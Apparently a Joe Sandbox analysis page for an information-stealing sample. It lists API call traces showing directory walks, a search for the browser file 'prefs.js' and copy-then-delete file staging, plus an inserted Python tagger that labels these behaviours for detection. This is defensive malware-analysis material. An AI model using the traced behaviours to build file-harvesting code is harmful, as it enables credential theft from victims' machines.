                                  • Opcode Fuzzy Hash: f64dd78f470d60d5e6684bba1db7ab347a0029ed743c8e05a62c1da31839ea41
                                  • Instruction Fuzzy Hash: E66175B5950218ABCB20EBE0DC45FEA73BDBB49700F40458DB50996181EB74EB85CF95
                                  APIs
                                  • wsprintfA.USER32 ref: 022F3B33
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F3B4A
                                  • lstrcat.KERNEL32(?,?), ref: 022F3B9C
                                  • StrCmpCA.SHLWAPI(?,00420F70), ref: 022F3BAE
                                  • StrCmpCA.SHLWAPI(?,00420F74), ref: 022F3BC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F3ECE
                                  • FindClose.KERNEL32(000000FF), ref: 022F3EE3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID:
                                  • API String ID: 1125553467-0
                                  • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction ID: 952b6c6c87480ad450b957f1f740d4f13af54a33d405923b0fe96e5fa480afff
                                  • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                  • Instruction Fuzzy Hash: F4A170B5A50218ABDB74DFE4CC84FEEB37ABF49300F444598A60D96144EB749B84CF62
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                  • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                  • wsprintfA.USER32 ref: 004145A6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                  • FindClose.KERNEL32(000000FF), ref: 004146A0
                                  • lstrcatA.KERNEL32(?,0088C588,?,00000104), ref: 004146C5
                                  • lstrcatA.KERNEL32(?,0088B228), ref: 004146D8
                                  • lstrlenA.KERNEL32(?), ref: 004146E5
                                  • lstrlenA.KERNEL32(?), ref: 004146F6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 13328894-2848263008
                                  • Opcode ID: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                  • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                  • Opcode Fuzzy Hash: b19de660a787c585203e961524785ef4f8c7c5ebf2fdcdf8f42e36bc1f4495a2
                                  • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                  APIs
                                  • wsprintfA.USER32 ref: 022F4B93
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                  • StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                  • StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                  • FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction ID: 8a96fbd99315f11866ddfb7799df7a3b88a99b978fc153fb39681307166f6792
                                  • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                  • Instruction Fuzzy Hash: BF6176B6950218ABCB24EFE0DD48FEAB3BDFB49700F404598A60D92144EB75A785CF91
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 022EC15C
                                  • StrCmpCA.SHLWAPI(?,004213F8), ref: 022EC1B4
                                  • StrCmpCA.SHLWAPI(?,004213FC), ref: 022EC1CA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022ECA26
                                  • FindClose.KERNEL32(000000FF), ref: 022ECA38
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction ID: 515f4dc4328690271e4ef63c10740bfe72ce211f0698a665500e873e7073eb5a
                                  • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                  • Instruction Fuzzy Hash: 17424172920304ABCF54FBE4DD95EEDB37AAF94700F404169A60E96198EF349B48CF51
                                  APIs
                                  • wsprintfA.USER32 ref: 00413EC3
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                  • FindClose.KERNEL32(000000FF), ref: 00414081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                  • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                  • Opcode Fuzzy Hash: 99b6f57015465be570b51e732a918a206cfe933a16528d1161771a5eb7529697
                                  • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 022F47E7
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022F47EE
                                  • wsprintfA.USER32 ref: 022F480D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4824
                                  • StrCmpCA.SHLWAPI(?,00420FC4), ref: 022F4852
                                  • StrCmpCA.SHLWAPI(?,00420FC8), ref: 022F4868
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F48F2
                                  • FindClose.KERNEL32(000000FF), ref: 022F4907
                                  • lstrcat.KERNEL32(?,0064A524), ref: 022F492C
                                  • lstrcat.KERNEL32(?,0064A22C), ref: 022F493F
                                  • lstrlen.KERNEL32(?), ref: 022F494C
                                  • lstrlen.KERNEL32(?), ref: 022F495D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID:
                                  • API String ID: 671575355-0
                                  • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction ID: f64c76d73fef15a40c69913949843d6cd838b9dcefb2fd7c36363173fe78561d
                                  • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                  • Instruction Fuzzy Hash: D65196B9550218ABCB60EFF0DD89FEEB37DAB58700F404598E70992194DBB49B84CF91
                                  APIs
                                  • wsprintfA.USER32 ref: 022F412A
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022F4141
                                  • StrCmpCA.SHLWAPI(?,00420FAC), ref: 022F416F
                                  • StrCmpCA.SHLWAPI(?,00420FB0), ref: 022F4185
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022F42D3
                                  • FindClose.KERNEL32(000000FF), ref: 022F42E8
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction ID: f552050cb3c24e044b2156bc477af6bd32f687b64f0bc92d96c1aec3e101da15
                                  • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                  • Instruction Fuzzy Hash: 1D5183B5910218BBCB24FBF0DC85EEAB37DBB48700F404598A74992044DBB5AB85CF95
                                  APIs
                                  • wsprintfA.USER32 ref: 0040ED3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                  • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                  • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                  • Opcode Fuzzy Hash: 7c62be60ea4ce17a6daee6ca2e1ad8d80329f85963da6490b9882dd3eef46d84
                                  • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                  • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                  • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: 4@$\*.*
                                  • API String ID: 2325840235-1993203227
                                  • Opcode ID: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                  • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                  • Opcode Fuzzy Hash: 2fdb38499aad82abd71ff5b0795ef68458680d2d1f732a1e4f71a59c5be8a5c9
                                  • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                  • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                  • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                  • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                  • Opcode Fuzzy Hash: c63fd1c20efeb8716f133c94eea4b1cf0d084daeba1700bb8994144291ed7823
                                  • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                  • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                  • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                  • FindClose.KERNEL32(000000FF), ref: 00401E32
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                   • Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004BD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.00000000004E2000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000064A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2342500071.000000000065C000.00000040.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                  • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                  • Opcode Fuzzy Hash: b05b312c236247dd8bb4291ae9665c13a99689da75fb9ac0a03e7b6d5e9b60d0
                                  • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
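The function records on this page (an APIs block, the memory-dump source, and the Similarity fields carrying the API String ID and the fuzzy hashes) are easier to triage by machine than by eye. The Python below is an added example, not Joe Sandbox's or the sample's code: it parses records in this layout, keeps the "Part of subcall function" lines apart from the function's own calls, strips the "Download File" link label that the page glues onto the dump names, tags each function by the API combination it contains (the rule labels are the editor's, not the report's), and groups records that share the first half of the API String ID, which is how the copy of a function in the 00400000 image and its copy in the 022E0000 region line up. The SAMPLE text is assembled from three records on this page with the hash fields trimmed.

```python
"""Parser and behaviour tagger for the 'Executed Functions' records on this page. Added
example, not Joe Sandbox's or Stealc's code: the record layout and the rule labels are the
editor's reading of the listing; SAMPLE is built from three of the page's records, trimmed."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE = r"""
APIs
  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
• FindFirstFileA.KERNEL32(00000000,?,00000000,?), ref: 00401923
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
• DeleteFileA.KERNEL32(00000000), ref: 00401DCA
• FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
Memory Dump Source
• Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2342500071.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: \*.*
• API String ID: 1415058207-1173974218
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,?), ref: 022E1B8A
• CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022E1FA7
• DeleteFileA.KERNEL32(00000000), ref: 022E2031
• FindNextFileA.KERNEL32(000000FF,?), ref: 022E2087
Memory Dump Source
• Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
Similarity
• API String ID: 1415058207-0
APIs
• GetSystemTime.KERNEL32(0042110C,?), ref: 0041696C
• sscanf.NTDLL ref: 00416999
• SystemTimeToFileTime.KERNEL32(0042110C,00000000), ref: 004169B2
• ExitProcess.KERNEL32 ref: 004169DA
Memory Dump Source
• Source File: 00000000.00000002.2342500071.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API String ID: 2533653975-2248957098
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?(?P<api>\w+)\.(?P<mod>\w+)"
                    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")
# Behaviour tags, each keyed on the direct (non-subcall) API set of one function.
RULES = [
    ("directory walk (FindFirstFile/FindNextFile loop)", {"FindFirstFileA", "FindNextFileA"}),
    ("file staging: copy then delete inside a directory walk", {"FindFirstFileA", "CopyFileA", "DeleteFileA"}),
    ("base64 decode via CryptStringToBinaryA", {"CryptStringToBinaryA"}),
    ("keyboard-layout / locale enumeration", {"GetKeyboardLayoutList", "GetLocaleInfoA"}),
    ("date comparison followed by ExitProcess", {"GetSystemTime", "SystemTimeToFileTime", "ExitProcess"}),
]


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # (api, module, args, ref, subcall_of) tuples
    fields: dict = field(default_factory=dict)  # "Source File", "API String ID", ...; later keys overwrite

    @property
    def direct_apis(self):
        return {c[0] for c in self.calls if not c[4]}

    @property
    def api_hash(self):
        # "API String ID" is "<hash of API set>-<hash of string set>"; the first half is what
        # ties the on-disk copy and the unpacked copy of one function together.
        return self.fields.get("API String ID", "").split("-")[0]

    @property
    def dump_offset(self):
        m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return m.group(1) if m else ""


def parse_records(text):
    records, current, section = [], None, None
    for line in (raw.strip() for raw in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":                        # "APIs" opens every record
                current = FunctionRecord()
                records.append(current)
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            args = tuple(a for a in (m["args"] or "").split(",") if a)
            current.calls.append((m["api"], m["mod"], args, m["ref"], m["sub"] or ""))
        elif section not in (None, "APIs") and (m := FIELD_RE.match(line)):
            # the page glues its "Download File" link label onto the dump names
            current.fields[m["key"]] = m["val"].removesuffix("Download File").strip()
    return records


def classify(record):
    return [label for label, required in RULES if required <= record.direct_apis]


def group_by_api_hash(records):
    """API-set hash -> dump offsets it appears in (one function, several memory dumps)."""
    groups = defaultdict(list)
    for r in records:
        if r.api_hash:
            groups[r.api_hash].append(r.dump_offset)
    return dict(groups)
```

Paste the whole listing from the page in place of SAMPLE to get one tagged line per function; the RULES table is the place to add further API combinations worth flagging.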
                                  APIs
                                  • wsprintfA.USER32 ref: 022EEFA5
                                  • FindFirstFileA.KERNEL32(?,?), ref: 022EEFBC
                                  • StrCmpCA.SHLWAPI(?,00421538), ref: 022EF012
                                  • StrCmpCA.SHLWAPI(?,0042153C), ref: 022EF028
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EF515
                                  • FindClose.KERNEL32(000000FF), ref: 022EF52A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID:
                                  • API String ID: 180737720-0
                                  • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction ID: 5fc49010422755d1777c2abeaf54777e42781dc8abb2784f6c0d2cf12eb96ad2
                                  • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                  • Instruction Fuzzy Hash: 61E1F0729213189ADB98FBA4DD51EEEB33AAF64300F4041E9B20E62155EF345F89CF50
                                  APIs
                                    • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                    • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                    • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                    • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022FAC2C
                                    • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                    • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                    • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 022EDD52
                                  • StrCmpCA.SHLWAPI(?,004214B4), ref: 022EDD9A
                                  • StrCmpCA.SHLWAPI(?,004214B8), ref: 022EDDB0
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 022EE033
                                  • FindClose.KERNEL32(000000FF), ref: 022EE045
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2342930049.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22e0000_YLshJwBcrT.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction ID: 7851fd3f881908eb277134c6bd20698cd3f2e29a1a9bf94dece3e323b374f225
                                  • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                  • Instruction Fuzzy Hash: DD9152729203049BCF14FBF4DD559EDB37EAB99700F408668A94E96148EF389B1C8F91
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
